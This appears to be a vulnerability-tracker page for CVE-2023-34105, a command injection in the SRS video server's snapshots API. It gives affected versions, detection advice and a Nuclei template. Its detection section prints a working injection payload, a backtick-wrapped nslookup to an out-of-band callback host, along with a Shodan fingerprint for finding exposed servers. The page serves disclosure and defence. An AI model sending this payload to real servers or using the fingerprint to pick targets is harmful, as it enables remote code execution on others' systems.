CVE-2023-34105
published 2023-06-12CVE-2023-34105: SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's…
PriorityP181high7.5CVSS 3.1
AVNACHPRNUIRSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.76%
94.5th percentile
SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ossrs | simple_realtime_server | >= 5.0.137 < 5.0.157 | 5.0.157 |
| ossrs | simple_realtime_server | >= 6.0.18 < 6.0.48 | 6.0.48 |
| ossrs | srs | < 5.0-b1 | 5.0-b1 |
| ossrs | srs | — | — |
| ossrs | srs | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command{"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}
- →Look for POST requests to /api/v1/snapshots with a JSON body containing backtick-wrapped shell commands in the 'app' parameter — this is the injection vector for CVE-2023-34105. ↗
- →The injection occurs specifically in the 'app' parameter of the snapshots API JSON body; monitor for shell metacharacters (backticks, $(), pipes, semicolons) in that field.
- →Use the Shodan favicon hash 1386054408 to identify exposed SRS api-server instances on the internet for proactive asset discovery.
- →Successful exploitation produces an HTTP 200 response with a JSON body containing both '"code":' and 'data":' fields; correlate with outbound DNS from the server to detect OOB command execution.
- →Affected versions are v5.0.137–v5.0.156 and v6.0.18–v6.0.47; flag SRS instances in these version ranges as high-priority targets.
- ·The vulnerability requires user interaction (UI:R in CVSS) despite being unauthenticated; exploitation is a drive-by scenario, meaning a victim must trigger the request (e.g., via SSRF or a crafted link), not a fully autonomous server-side attack.
- ·The vulnerable code path is in the api-server component (server.go L761), which may be a separate process/port from the main SRS media server; ensure detection coverage targets the api-server's HTTP listener specifically.
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
SRS - Command Injection
nuclei·CVSS 7.5
CVE-2023-34105 [HIGH] SRS - Command Injection
SRS - Command Injection
SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
Template:
id: CVE-2023-34105
info:
name: SRS - Command Injection
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
impact: |
Unauthenticated attackers with user interaction can inject commands through the app parameter in the snapshots API to execute arbitrary commands on the SRS streaming server.
remediation: |
Update SRS (Simple Realtime Server) to a version newer than v5.0.156 or v6.0.47 that properly sanitizes input in the api-server snapshots endpoint.
reference:
- https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-c
https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761https://github.com/ossrs/srs/commit/1d878c2daaf913ad01c6d0bc2f247116c8050338https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761https://github.com/ossrs/srs/commit/1d878c2daaf913ad01c6d0bc2f247116c8050338https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62
2023-06-12
Published
Exploited in the wild